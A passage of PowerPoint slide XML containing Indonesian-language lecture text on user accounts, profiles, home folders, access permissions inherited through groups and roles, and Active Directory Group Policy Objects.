              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SID), nama, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (folder home). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diwariskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keanggotaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal-hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada Windows Active Directory, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (GPO). GPO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. GPO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas-batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Active Directory, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs, domain, dan unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (OU).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
